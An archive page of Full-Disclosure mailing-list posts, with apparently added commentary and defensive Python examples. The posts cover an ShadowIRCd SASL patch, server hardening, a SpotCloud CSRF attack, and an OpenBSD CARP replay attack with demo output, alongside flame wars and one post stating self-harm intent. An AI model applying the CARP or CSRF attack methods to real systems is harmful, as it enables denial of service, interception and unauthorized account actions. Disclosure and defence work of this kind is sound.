[Full-disclosure] Emergency patch for ShadowIRCd versions 6.3+ and Elemental-IRCd 6.5+

2014-03-18 Thread Sam Dodrill
_p,
sendto_one(target_p, form_str(RPL_SASLSUCCESS),
me.name, EmptyString(target_p->name) ? "*" : target_p->name);
target_p->preClient->sasl_complete = 1;
ServerStats.is_ssuc++;
-   server_auth_sasl(target_p);
+   //server_auth_sasl(target_p);
}
*target_p->preClient->sasl_agent = '\0'; /* Blank the
stored agent so someone else can answer */
}
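Review bot: the `+   //server_auth_sasl(target_p);` line disables the auth_user privilege grant by leaving the call in place as commented-out dead code, and it does so with a `//` line comment while the surrounding code uses `/* */` comments (see the `/* Blank the stored agent ... */` line just below). Since the cover note calls this a stopgap, either delete the call outright or guard it with `#if 0` plus a comment naming the reason, so the permanent fix is easy to locate and the disabled feature (auth::auth_user via SASL) is recorded in the code rather than only in the mail; note that `sasl_complete = 1` and `ServerStats.is_ssuc++` still run, so SASL success is still counted and reported, only the auth block privileges are withheld.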

This patch sometimes has issues when being applied by machine (use vim,
it's not hard) and should only be considered a stopgap to remove the worst
parts of the issue until a more permanent fix is made, tested, and released.

Attempts have been made to contact other networks that use any affected
versions of ShadowIRCd and Elemental-IRCd. All attempts to contact networks
I previously have not encountered have failed.

Patch directions are below:

1. Apply patch by hand
2. run make
3. run make install
4. Connect to the ircd, opering up
5. /modunload m_sasl.so
6. /modload m_sasl.so

You might be tempted to use /modreload, but *DO NOT*. There is a known
issue with reloading a module that has changed on disk that can cause a
segmentation fault. These directions should be followed *immediately* upon
receiving them to avoid opening yourself up to this exploit.

This bug appears to have been introduced with ShadowIRCd 6.3. Details from
the NEWS file below:

-- shadowircd-6.3.0
- use auth::auth_user for SASL. It is no longer usable in PASS (though its
  use-case there is non-existent), but you can now set so if a user
  successfully authenticates to the accountname in auth_user with SASL,
  they will get the proper auth block privs. You can have multiple auth_users
  in one auth block.

This patch does disable this functionality, but in this case the
inconvenience is worth the security.

Thanks for reading, and I hope you enjoyed this report. I've been wanting
to make a report to this mailing list for a while now and was hoping it
would not be on one of my own projects, but such is life. Should I request
a CVE be assigned for this as well?

Sam Dodrill
shadow.h...@gmail.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] one of my servers has been compromized

2011-12-05 Thread sam
Very useful, John Jacobs ... really helpful.
Do you maintain your blog or any other resource you want to share with us?
Thanks a ton.

On Mon, Dec 5, 2011 at 8:18 AM, Michael Wood  wrote:
> Awesome tips guys...
>
> On Dec 5, 2011 11:01 AM, "John Jacobs"  wrote:
>>
>>
>> > 2. Do you think said phpmyadmin vulns are reasonable attack vectors in
>> > my
>> > case?
>>
>> I do, I believe this to be the initial infection vector.  Scanning for
>> PHPMyAdmin is frequent, and since it's likely that it was present in its
>> default (or one of the default) URIs, discovery is likely.  There are a
>> plethora of scanners out there which look for PHPMyAdmin specifically and
>> add to the Internet noise-floor.
>>
>> You are taking the correct steps with the egress firewall policy.
>>
>> Forward-going, I think it may be valuable to consider:
>>
>> 1) Leveraging AppArmor and creating an enforcing profile for Apache; one
>> that controls by extension or path, what the HTTPd can write to or access.
>> Be strict but sane.
>> 2) Consider chrooting Apache via the 'chroot' directive for Apache (no
>> more mod_chroot required).
>> 3) Consider a strict ingress and egress firewall which would have prevented
>> the egress connection to the IRCd.
>> 4) Remain up to date; perhaps cron 'apt-get clean all; apt-get update;
>> apt-get -t lucid-security -y dist-upgrade' (I believe the security channel
>> is correct)
>> 5) Consider sane php.ini values and leverage Suhosin (plugin) as well
>> (http://www.hardened-php.net/suhosin/index.html); disallow url_fopen and
>> url_include.  Disallow the exec(), system(), passthru(), etc commands if
>> possible.  url_fopen() will thwart RFI.  LFI should be thwarted by a sane
>> AppArmor profile.
>> 6) Restrict access to PHPMyAdmin based on authentication or remove its
>> access entirely.
>> 7) Consider leveraging something like Fail2ban against Apache's error and
>> access logs looking for excessive high-frequency HTTP 404, 403, or 500
>> errors as these are indicative of scanning.  This is a great tool to stop
>> Web-app scanning.
>> 8) As you've already done with SSH, move it from TCP 22, PermitRootLogin
>> no, and disable password authentication using key-based authentication.
>> 9) Using OSSEC-HIDS (http://www.ossec.net/) with inotify() to watch
>> changes to your system and Apache directories including those that are HTTP
>> writable.
>> 10) Mount /tmp noexec,nosuid,nodev as others have recommended.
>> 11) Optionally use mod_security with a tuned ruleset or another WAF.
>>
>> I find #7 to be extremely helpful.  Feel free to hit me up for additional
>> clarification if needed.  I wish you the best, remember that
>> defense-in-depth is the best approach here.
>>
>> This is a good list-discussion as it is likely to yield many valuable ways
>> to correctly secure web applications.  Potentially any one of the
>> suggestions in #1, #2, #3, #4, #5, #6, #7, and #10 would have saved your
>> box.
>>
>> I hope this helped,
>> John
>>

-- 
Best Regards,
Suresh Kumar Prajapati
Linux System Admin
E-mail: er.sureshprajap...@gmail.com
Mob No: +91-8800920533

Theory is when you know all and nothing works. Practice is when all
works and nobody knows why. In this case we have put together theory
and practice: nothing works... and nobody knows why!

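As an added illustration of tip #7 above (not code from this thread or from Fail2ban itself), the following Python applies a Fail2ban-style maxretry/findtime rule to Apache combined-format access log lines: an IP is flagged once it has produced enough 403/404/500 responses inside a sliding time window, while a visitor with one missing stylesheet is left alone. The log lines, IPs, paths and times are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache "combined" access log line: client IP, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
SCAN_STATUSES = {403, 404, 500}  # the "excessive high-frequency" codes in tip #7


def parse_line(line):
    """Return (ip, timestamp, request, status) or None for a line that does not
    match the format (a Fail2ban filter would simply ignore such lines too)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT),
            m.group("req"), int(m.group("status")))


def find_scanners(lines, maxretry=5, findtime=timedelta(seconds=60)):
    """Sliding-window version of a Fail2ban jail: an IP is flagged the moment
    it has produced `maxretry` responses from SCAN_STATUSES within `findtime`.
    Returns {ip: timestamp of the request that tripped the threshold}."""
    recent = defaultdict(deque)  # ip -> timestamps of recent error responses
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, _req, status = parsed
        if status not in SCAN_STATUSES or ip in flagged:
            continue
        window = recent[ip]
        window.append(ts)
        while window and ts - window[0] > findtime:  # age out old hits
            window.popleft()
        if len(window) >= maxretry:
            flagged[ip] = ts
    return flagged


# Constructed sample log: one host probing for PHPMyAdmin-style paths, one
# ordinary visitor with a single missing stylesheet, and an old hit from the
# scanner that falls outside the 60 second window.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Dec/2011:07:00:00 +0000] "GET /admin/ HTTP/1.1" 404 209 "-" "scanner"
198.51.100.20 - - [05/Dec/2011:08:10:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Dec/2011:08:10:01 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "scanner"
203.0.113.7 - - [05/Dec/2011:08:10:02 +0000] "GET /pma/ HTTP/1.1" 404 209 "-" "scanner"
198.51.100.20 - - [05/Dec/2011:08:10:03 +0000] "GET /missing.css HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Dec/2011:08:10:03 +0000] "GET /myadmin/ HTTP/1.1" 404 209 "-" "scanner"
203.0.113.7 - - [05/Dec/2011:08:10:04 +0000] "GET /PHPMyAdmin/ HTTP/1.1" 403 209 "-" "scanner"
203.0.113.7 - - [05/Dec/2011:08:10:05 +0000] "GET /phpMyAdmin-2.11/ HTTP/1.1" 404 209 "-" "scanner"
"""

if __name__ == "__main__":
    for ip, when in find_scanners(SAMPLE_LOG.splitlines()).items():
        print("scanner", ip, "tripped at", when.isoformat())
```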


Re: [Full-disclosure] Steam defaced

2011-11-11 Thread Sam Johnston
On Fri, Nov 11, 2011 at 12:54 AM, xD 0x41  wrote:
>
> about the clouds, dude, i found the whole attacking of amazon as rude,

So did I, which is why I came to Amazon's defense in pointing out that
those in glass houses shouldn't be throwing stones. The company
(Enomaly) abusing Amazon over a complex SAML XML digsig
vulnerability[1] was/is still using a trivial vulnerable signature
mechanism in their own products that Amazon had fixed years ago[2],
among other issues which I had reported 6+ months earlier (not
validating requests, passing prices to clients in hidden form fields,
etc). Their security response is also appalling[3].

> and shit, so, as i said before, you're a lamer. and, just stfu and wear
> it, that's MY opinion i did not say the whole list has to follow
> shithead.
>
> stfu and ride your magical carpet thru the clouds... :P~
> to the others who find cloud bs amusing, or ripping or fucking with
> amazon as amusing, go read what your kids are buying shit from.. then
> maybe you would see, some places, you do not fuck with, you treat
> with respect, because they sometimes won't affect you directly, but
> one day, it may well do this, thanks to your silly exploits on things
> that should not be used like this, features manipulated into
> exploits...shit, you should not be disclosing shit with amazon, on Fd,
> fullstop.
> If you cannot see my view then, you're just as stupid as i have thought.
> now go play with your cloud formations, and upload some f1les to s0m3
> l33t 4p4ch3 s3rv3r kid.
>
> eh sorry henri and others, but i had to just get that out to, about
> cloud/sploitcloud... it is fkn ridiculous...asking for trouble, people
> like that should get knocks on the door, simply to be put into a
> mental home for their own good.

Sorry for the confusion but that's not at all what I said[4]. No harm
done — others replied off list to say they found it amusing. Anyway I
have a credit card to go cancel (per the subject of this thread).

Sam

1. http://www.theregister.co.uk/2011/11/01/amazon_downplays_cloud_crypto_flaw/
2. http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html
3. http://samj.net/2011/11/how-not-to-respond-to-vulnerability.html
4. http://samj.net/2011/10/sploitcloud.html



[Full-disclosure] SploitCloud: exploiting cloud brokers for fun and profit

2011-11-10 Thread Sam Johnston
Apologies for the HTML — too many inline links.

Sam
SploitCloud: exploiting cloud brokers for fun and profit
<http://samj.net/2011/10/sploitcloud.html>

My friends at Enomaly <http://www.enomaly.com/> have been beating
<http://twitter.com/#%21/ruv/status/129928434079109121> up
<http://twitter.com/#%21/ruv/status/129929111526318081> on
<http://twitter.com/#%21/ruv/status/129934534870446080> Amazon Web Services
(AWS) <http://aws.amazon.com/> over the XML signature element wrapping
<http://dl.acm.org/citation.cfm?id=1103026> vulnerability currently being
overhyped <http://www.theregister.co.uk/2011/10/27/cloud_security/> by
<http://www.fiercecio.com/techwatch/story/security-flaw-cloud-architectures-including-amazon-web-services/2011-10-28>
the
<http://www.pcworld.com/businesscenter/article/242598/researchers_demo_cloud_security_issue_with_amazon_aws_attack.html>
press <http://www.networkworld.com/news/2011/102611-security-cloud-252406.html>,
which is ironic given their security
<http://www.securityfocus.com/archive/1/archive/1/500573/100/0/threaded> track
<http://www.securityfocus.com/archive/1/archive/1/500573/100/0/threaded> record
<http://www.securityfocus.com/archive/1/500989> and unfortunate given I rather
like what Amazon have achieved.

Back in March I reported multiple vulnerabilities
<https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/1993b3ab1643bfa2>
in SpotCloud <http://www.spotcloud.com/> (including their having copied
Amazon's vulnerable signatures
<http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html>
years after they were reported and fixed
<http://www.jamesmurty.com/2008/12/31/aws-query-signature-version-2/>) and I
was told I was unethical
<https://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe> and my
report that they "*may not validate incoming web and/or API requests and if
so, may be vulnerable to cross-site request forgery in which an attacker could
make unauthorised management requests on behalf of a user*" was "unactionably
vague
<https://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95>".

To demonstrate the severity of the outstanding vulnerability go grab yourself
a SpotCloud account <https://spotcloud.appspot.com/buyer/register>, charge it
up <https://spotcloud.appspot.com/buyer/balance/topup> (ignoring PCI-DSS
<http://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard>
for a second given they're collecting credit card numbers via App Engine) and
click the image below. I'll silently create an instance for you using a hidden
IFRAME, but you're welcome to experiment with more destructive experiments
like deleting existing instances and uploading malicious workloads.

*Update:* If you look at the code you'll see the hourly rate is passed to the
client as "*cost*" and presumably trusted on return (if not, why is it there?).
I haven't seen a price manipulation vulnerability
<http://www.symantec.com/connect/articles/common-security-vulnerabilities-e-commerce-systems>
in over a decade, but I'm not tinkering with it because I don't fancy being
accused of stealing from them or their providers.

*Update:* While the consumer API <http://dl.enomaly.com/scbuyerapi> now uses
OAuth, the provider API <http://dl.enomaly.com/scprovider> still uses Amazon's
vulnerable signatures
<http://www.daemonology.net/blog/2008-12-18-AWS-signature-version-1-is-insecure.html>
for authentication:

import hmac
from hashlib import sha1

# constructed example of the request parameters being signed
parameters = {'ecp_username': 'spotcloudusername', 'paramA': 'value',
              'Timestamp': '2006-12-08T07:48:03Z'}

# sorts by key.lower(), i.e. A b c Dee e ffFf
sorted_keys = sorted(parameters.keys(), key=lambda k: k.lower())

# concatenates key,value pairs with no delimiter: a=1,b=2,C=32 becomes "a1b2C32"
data = ''.join(key + parameters[key] for key in sorted_keys)

# data is now:
# ecp_usernamespotcloudusernameparamAvalueTimestamp2006-12-08T07:48:03Z
digest = hmac.new(b'spotcloudpassword', data.encode(), sha1).digest()


This may have been safe over SSL were it not for the fact that client
libraries (including python) typically don't validate the certificate chain
by default.
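As an added illustration (not part of the original post and not Enomaly's or Amazon's code), the following Python builds the version-1 string exactly as the snippet above does, shows that two different parameter sets both concatenate to the page's own "a1b2C32" and therefore receive the same HMAC, and contrasts that with a delimited, percent-encoded canonical string in the spirit of the version-2 scheme Amazon moved to. The secret key and the parameter sets are constructed placeholders.

```python
import hmac
from hashlib import sha1
from urllib.parse import quote

# Constructed placeholder for the shared secret (not a real credential).
SECRET = b"spotcloudpassword"


def v1_string_to_sign(parameters):
    """Version-1 style canonical string, as in the snippet above: keys sorted
    case-insensitively, then each key glued directly to its value with no
    delimiter, so the signed bytes do not record where a value ends and the
    next key begins."""
    keys = sorted(parameters, key=lambda k: k.lower())
    return "".join(k + parameters[k] for k in keys)


def v2_string_to_sign(parameters):
    """Hardened form in the spirit of the version-2 scheme: keys sorted by byte
    order, every key and value percent-encoded, pairs joined with '=' and '&',
    so the boundaries between parameters are part of what gets signed."""
    keys = sorted(parameters)
    return "&".join(
        quote(k, safe="-_.~") + "=" + quote(parameters[k], safe="-_.~")
        for k in keys
    )


def sign(string_to_sign, secret=SECRET):
    """HMAC-SHA1 over the canonical string, as the provider API does."""
    return hmac.new(secret, string_to_sign.encode(), sha1).hexdigest()


def same_v1_signature(params_a, params_b):
    """True when two distinct parameter sets carry the same v1 MAC: a request
    signed as params_a would also verify if the server read it as params_b."""
    return params_a != params_b and sign(v1_string_to_sign(params_a)) == sign(
        v1_string_to_sign(params_b)
    )


def same_v2_signature(params_a, params_b):
    """Same check against the delimited canonical form."""
    return params_a != params_b and sign(v2_string_to_sign(params_a)) == sign(
        v2_string_to_sign(params_b)
    )


# Constructed requests: the page's own "a=1,b=2,C=32 becomes a1b2C32" example,
# and a second parameter set whose concatenation is the same string.
REQUEST = {"a": "1", "b": "2", "C": "32"}
LOOKALIKE = {"a": "1b2", "C": "32"}

if __name__ == "__main__":
    print(v1_string_to_sign(REQUEST), v1_string_to_sign(LOOKALIKE))
    print("v1 collides:", same_v1_signature(REQUEST, LOOKALIKE))
    print(v2_string_to_sign(REQUEST), "|", v2_string_to_sign(LOOKALIKE))
    print("v2 collides:", same_v2_signature(REQUEST, LOOKALIKE))
```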

*Update:* Wells Fargo reports "CHECK CRD PURCHASE SPOT CLOUD ETOBICOKE CD" as
"Unusual Activity" in emailed alert… canceling card, requesting re-issue.
Should have used a virtual card. Wonder if Google know their App Engine poster
child
<http://googleappengine.blogspot.com/2011/03/enomaly-chooses-google-app-engine-for.html>
is using it to collect credit card details?

*Update:* It is believed that Private SpotCloud
<http://spotcloud.com/Private.50.0.html> and Enomaly Elastic Computing
Platform (ECP) <http://www.enomaly.com/Product-Overview.419.0.html> are also
vulnerable to cross-site request forgery
<http://en.wikipedia.org/wiki/Cross-site_request_forgery>, but without access
to the software I have no way to 

[Full-disclosure] How NOT to respond to vulnerability reports

2011-11-10 Thread Sam Johnston
Apologies again for the HTML — too many inline links for text. I'd probably
leave these guys alone were it not for stuff like this
<http://www.enomaly.com/High-Assurance-E.484.0.html>:

"*With Enomaly’s patented security functionality, a service provider can
deliver a unique, high security Cloud Computing service – commanding a
higher price point than commodity public cloud providers.*"

Enjoy.

Sam

How NOT to respond to vulnerability reports
<http://samj.net/2011/11/how-not-to-respond-to-vulnerability.html>
<http://memegenerator.net/instance/11298030>

Reuven Cohen <http://www.elasticvapor.com/> and the guys at Enomaly
<http://www.enomaly.com/> could write the book on how NOT to respond to
vulnerability reports:

   1. Don't disavow vulnerabilities
      <https://twitter.com/#%21/ruv/status/133221009342992384> in products
      you've previously taken
      <http://www.elasticvapor.com/2008/04/enomaly-launches-giftagcom-for-bestbuyg.html>
      credit
      <http://www.elasticvapor.com/2008/09/bestbuys-giftagcom-getting-some-press.html>
      for
   2. Don't claim issues are not valid
      <http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>
      while denying researchers a right of reply
   3. Don't claim obvious issues are "unactionably vague
      <http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>"
      and then ignore them, even after a working exploit is publicly
      available <http://samj.net/2011/10/sploitcloud.html>
   4. Don't claim trivial remote root exploits are "theoretically valid but
      extremely difficult to exploit
      <http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>"
   5. Don't claim it's ok to rely on
      <http://groups.google.com/group/spotcloudbuyers/browse_thread/thread/526fc1d60bfa6e95/426c91bc73b493be>
      security by obscurity or race conditions
   6. Don't turn on moderation
      <http://groups.google.com/group/spotcloudbuyers/about> because a
      researcher posts a vulnerability report
      <http://groups.google.com/group/spotcloudbuyers/msg/a1e010147241298e> to
      your lists
   7. Don't subsequently ban a researcher from your lists
      <http://1.bp.blogspot.com/-Kbx1w50mK_g/Trp0D54k9LI/AYs/ZZ0tIMoPLZE/s1600/spotcloud-banned.png>
      because they tried to notify your users when you failed to
   8. Don't claim that security vulnerabilities are ok
      <http://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe>
      because there have been "*no reports of any security compromise*"
   9. Don't claim
      <http://samj.net/2009/08/twitter-pro-best-buys-twelpforce-is.html>
      "*other mitigating factors that have been present in the environment
      from the beginning*" when the vulnerability has already been
      demonstrated
   10. Don't ask for private notification of vulnerabilities
      <http://samj.net/2009/08/twitter-pro-best-buys-twelpforce-is.html> only
      to then ignore/dispute them
   11. Don't publicly call researchers unethical
      <http://groups.google.com/group/spotcloudbuyers/msg/237ffac277ea8bbe>
      for opting for full disclosure
      <http://en.wikipedia.org/wiki/Full_disclosure>, especially when they do
      so because you have been reticent and unresponsive in the past
   12. Don't release ineffective fixes
      <http://seclists.org/bugtraq/2009/Feb/142>, especially when the
      researcher has told you exactly how to fix it
   13. Don't dispute the vulnerability
      <http://samj.net/2010/02/private-cloud-security-is-no-security.html>
      when a clearinghouse like Secunia <http://secunia.com/> contacts you to
      verify it
   14. Don't criticise researchers <http://twitter.com/ruv/status/8623995916>
      for reviewing your product
   15. Don't shoot the messenger
      <http://www.elasticvapor.com/2008/11/v-for-vendetta.html>
   16. Don't downplay critical vulnerabilities
      <http://www.elasticvapor.com/2008/11/v-for-vendetta.html> as
      "*relatively minor*", "random" paths as "*pretty hard to guess*", etc.
   17. Don't send in board members
      <http://samj.net/2010/02/private-cloud-security-is-no-security.html?showComment=1265232836593#c6024067410560428601>
      to fight your battles
   18. Don't claim new products
      <http://samj.net/2010/02/private-cloud-security-is-no-security.html?showComment=1265232836593#c6024067410560428601>
      having "*significant new and enhanced functionality*" is a valid excuse
   19. Don't make security claims
      <http://www.enomaly.com/High-Assurance-E.484.0.html> like "High
      Assurance" if you're not going to take security seriously
   20. Don't claim <https://spotcloud.appspot.com/terms> that "*Enomaly
      shall be entitled to (i) suspend or de-ac

[Full-disclosure] Full-Disclosure - sick of your nonsense

2011-10-06 Thread Sam Goody
Dude, I think many people including myself are sick of your 
nonsense on top of trying to provoke fights on full-disc.

This list is not for chatting and 90% of what you've written is 
subpar.

Please keep the nonsense to yourself. You will now be added to the 
n3td3v e-mail black list.

Cheers!



[Full-disclosure] OpenBSD CARP Hash Vulnerability

2010-12-18 Thread Sam Banks
Hello FD,

I disclosed this bug to the BSDs and no one is interested in fixing it so
here you go. The two files attached are as follows:

* scapy-carp.patch - A patch against the latest Scapy (currently 2.1.0) so
it understands the CARP protocol. The PoC won't work without the patch
* carp-poc.py - A very quick and dirty PoC which will force all CARP nodes
into backup mode. You need to be on the same Layer 2 as the CARP nodes. Also
make sure you have the correct interface selected

Happy hacking,

wolfie

==
VULNERABILITY DETAILS
==

The OpenBSD CARP implementation (and all derivatives, such as FreeBSD and
NetBSD) fails to include all fields contained in the "carp_header"
structure[1] when calculating the SHA1 HMAC hash of the packet in the
function carp_proto_input_c[2]. The two 8-bit fields not included in the
hash generation are "carp_advskew" and "carp_advbase". Among other
functions, the fields are both set to 255 by the master CARP node to
indicate that it wants to step down from the master role.

This behaviour can be exploited to force a backup member to assume the role
of master by capturing a master CARP advertisement, updating the two fields
in question to 255 and replaying the modified packet. A backup node will
receive this packet and the hash check will be satisfied as the two modified
fields are not included in the hash generation. A backup node will now
assume the master role and the current master will step down to backup.

At this point, the attacker can now capture an advertisement from the new
master. By replaying both of the unmodified master advertisements, all CARP
nodes assume the backup role. At this point, a Denial of Service (DoS)
condition has been introduced as no device answers ARP requests for the
Virtual IP (VIP). The attacker can now decide whether to start answering ARP
for the VIP therefore performing a Man in the Middle (MitM) attack.

[1] http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.h?rev=1.28
[2] http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/ip_carp.c?rev=1.179
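As an added example from the monitoring side (not part of the advisory or the attached PoC), the following Python parses the fixed 36-byte carp_header from ip_carp.h and implements the detection the description above suggests: a master increments its counter with every advertisement, so an advertisement repeating a (vhid, counter, HMAC) triple already seen is a replay, and one whose advbase/advskew differ from the original while the HMAC is unchanged is precisely the modified replay that the two uncovered fields allow. The packets are constructed with a dummy HMAC; the detector does not verify the HMAC itself (it has no CARP password), it only compares packets against each other.

```python
import struct
from collections import namedtuple

# Wire layout of struct carp_header from OpenBSD's ip_carp.h (36 bytes in
# network byte order): version/type nibbles, vhid, advskew, authlen, demote,
# advbase, checksum, 64-bit counter, 20-byte SHA1 HMAC.
CARP_HEADER = struct.Struct("!BBBBBBH8s20s")
CARP_ADVERTISEMENT = 1
CARP_AUTHLEN = 7  # counter + HMAC length in 32-bit words (28 bytes)

CarpAdvert = namedtuple(
    "CarpAdvert",
    "version type vhid advskew authlen demote advbase cksum counter md",
)


def parse_carp(payload):
    """Parse the fixed-size carp_header at the start of an IP protocol 112
    payload; raises ValueError on anything too short to be a CARP packet."""
    if len(payload) < CARP_HEADER.size:
        raise ValueError("truncated CARP header")
    vt, vhid, advskew, authlen, demote, advbase, cksum, counter, md = (
        CARP_HEADER.unpack_from(payload)
    )
    return CarpAdvert(vt >> 4, vt & 0x0F, vhid, advskew, authlen, demote,
                      advbase, cksum, counter, md)


class CarpReplayDetector:
    """Passive monitor for the pattern described above. A genuine master never
    resends a counter, so an advertisement whose (vhid, counter, md) was seen
    before is a replay; if its advbase/advskew differ from the original it is
    the modified replay that the uncovered fields make possible. A real
    step-down by the master carries a fresh counter and is not flagged."""

    def __init__(self):
        self._seen = {}  # (vhid, counter, md) -> (advbase, advskew)

    def observe(self, payload):
        """Return an alert string for a suspicious advertisement, else None."""
        adv = parse_carp(payload)
        if adv.type != CARP_ADVERTISEMENT:
            return None
        key = (adv.vhid, adv.counter, adv.md)
        timing = (adv.advbase, adv.advskew)
        previous = self._seen.get(key)
        if previous is None:
            self._seen[key] = timing
            return None
        if previous != timing:
            return ("modified replay for vhid %d: advbase %d->%d, advskew %d->%d "
                    "(HMAC unchanged, so the change lies outside the hash)"
                    % (adv.vhid, previous[0], adv.advbase, previous[1], adv.advskew))
        return "duplicate advertisement for vhid %d: counter reused" % adv.vhid


def build_advert(vhid, advbase, advskew, counter, md):
    """Constructed test packet: version 2, type 1 (advertisement). The checksum
    is left at zero and the HMAC is whatever 20 bytes the caller supplies."""
    version_type = (2 << 4) | CARP_ADVERTISEMENT
    return CARP_HEADER.pack(version_type, vhid, advskew, CARP_AUTHLEN, 0,
                            advbase, 0, counter, md)


if __name__ == "__main__":
    # Constructed sequence: the master's advertisement (advbase 1, advskew 0,
    # as in the ifconfig output below), the same packet with both fields set
    # to 255, then the original packet once more.
    counter, md = (0).to_bytes(7, "big") + b"\x05", b"\x11" * 20
    detector = CarpReplayDetector()
    for pkt in (build_advert(50, 1, 0, counter, md),
                build_advert(50, 255, 255, counter, md),
                build_advert(50, 1, 0, counter, md)):
        print(detector.observe(pkt))
```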


DEMO OF ATTACHED CODE


---
MASTER CARP NODE
---
# uname -a; id
OpenBSD ipsec.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state
master carppeer 192.168.252.138 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: MASTER carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.138
groups: carp
status: master
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.138
groups: carp
status: backup
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
#

---
BACKUP CARP NODE
---

# uname -a; id
OpenBSD backdoor.carpdemo 4.8 GENERIC#136 i386
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# ifconfig carp0 create carpdev vic0 pass supersecretpassword vhid 50 state
backup carppeer 192.168.252.137 192.168.50.1/24
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.137
groups: carp
status: backup
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
# ifconfig carp0
carp0: flags=8843 mtu 1500
lladdr 00:00:5e:00:01:32
priority: 0
carp: BACKUP carpdev vic0 vhid 50 advbase 1 advskew 0 carppeer
192.168.252.137
groups: carp
status: backup
inet6 fe80::200:5eff:fe00:132%carp0 prefixlen 64 scopeid 0x5
inet 192.168.50.1 netmask 0xff00 broadcast 192.168.50.255
#

--
ATTACKER'S COMPUTER
--

r...@traumatic:/files/tools# ./carp-poc.py
WARNING: No route found for IPv6 destination :: (no default route?)
[*] capturing current master's advertisement
[*] forcing failover of master
[*] waiting for new master to be elected
[*] capturing new master's advertisement
[*] replaying both captured packets
diff -Nruw ../scapy-2.1.0-orig/scapy/config.py ./scapy/config.py
--- ../scapy-2.1.0-orig/scapy/config.py	2010-12-18 14:10:38.0 +1300
+++ ./scapy/config.py	2010-12-18 14:11:39.0 +1300
@@ -366,7 +366,7 @@
 netcache = NetCache()
 load_layers = ["l2", "inet",

Re: [Full-disclosure] IRC FRAUD ALERT ADVISORY 01-2010-07

2010-07-09 Thread Sam Hocevar
On Thu, Jul 08, 2010, IRC FRAUD ALERT wrote:

> Our team strictly consists of volunteers that use their spare time to
> help make the Internet, especially IRC, a better and enjoyable place
> by exposing the scammers and hypocrites of IRC.

   Dear sir, could you elaborate on how exactly blackmailing and
threatening me by e-mail, then sending falsified copies of my answers to
my ISP's CTO and owner as well as to my employer's owner and director
"help make the Internet a better place"?

   You won. Your actions have truly demolished me beyond any possible
recovery and my only hope is that the moral responsibility of my
psychological breakdown and forthcoming self-inflicted scars will haunt
you for the rest of your life.

Regards,
-- 
Sam.



Re: [Full-disclosure] IRC FRAUD ALERT ADVISORY 01-2010-07

2010-07-08 Thread Sam Hocevar
On Thu, Jul 08, 2010, IRC FRAUD ALERT wrote:

> The blog is running WordPress 3.1-alpha, which does not have comment
> moderation enabled by default, so it's clearly weev's intention to
> [...]

   Dear sir, why would you lie about trivially verifiable facts? Anyone
can check in the source code that this has actually been Wordpress's
default behaviour for more than 6 years.

Cheers,
-- 
Sam.



Re: [Full-disclosure] Impossible to Maintain Secure Session With Twitter.com Web Interface

2010-05-03 Thread Sam Quigley
> iSEC Partners Security Advisory - 2010-001-twitter 
> https://www.isecpartners.com
> 
[…]
> 2010-04-26: Twitter asserts that it is now possible to maintain an HTTPS
> session if the session begins with HTTPS; i.e. users can
> navigate to https://twitter.com to start an HTTPS session.
> However, https://twitter.com/ contains HTTP resources, including
> a JSON response from http://twitter.com. An active network
> attacker could potentially use this weakness to insert their
> own code into the page and maintain control over the user's
> session.
> 

Also worth noting that, until yesterday, all SSL pages (including sensitive 
ones like /oauth/authorize) loaded Javascript from maps.google.com without 
